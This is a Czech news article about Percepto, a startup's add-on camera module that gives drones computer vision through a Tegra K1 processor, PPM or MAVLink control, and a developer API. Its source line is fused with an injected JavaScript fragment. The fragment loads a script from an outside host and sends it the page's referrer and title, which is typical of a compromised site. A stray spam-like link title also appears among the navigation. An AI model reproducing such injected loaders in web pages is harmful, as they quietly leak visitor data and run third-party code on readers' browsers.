UAV | UAS

Percepto – startupové add-on oči pro drony

Rozšíření možností dronů o počítačové vidění, tedy schopnost získávat informace ze zachyceného obrazu, si klade za cíl startup Percepto. To je postavené na mobilním procesoru Nvidia Tegra K1 SoC

Percepto je navrženo jako přídavný model, o velikost balíčku karet s kamerou, který lze relativně snadno uchytit na libovolném modelu, jehož ovladač má PPM vstup. V závislosti na letovém kontroléru je komunikace vedena pomocí PPM nebo digitální připojení jako MAVLink. Nastavit lez pouze ovládání části řídících kanálů, takže zbylé jsou volné pro manuální zásah. Samotné uchycení je stejné jako připojení gimbalu nebo FPV vysílače. Dron musí být samozřejmě dost velký na to, aby unesl další zátěž cca 140 g, což je hmotnost Percepta.

foto: Percepto

foto: Percepto

Pro vývoj vlastních programů bude k dispozici API a předzpracované vidění primitiv (přímka, kružnice, elipsa apod.). Lze tak rychle napsat kód, který bude rozpoznávat gesta, která lze použít pro řízení dronu.
Percepro je stále ve stádiu vzniku a autoři mají v úmyslu získat potřebné prostředky crowdfundingem, zřejmě tradičně na Kickstarteru.

zdroj: www.percepto.cos.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “;

Předchozí článek

This bag is also easy to clean

Další článek

Fotogrammetrický Correlator3D ve verzi 6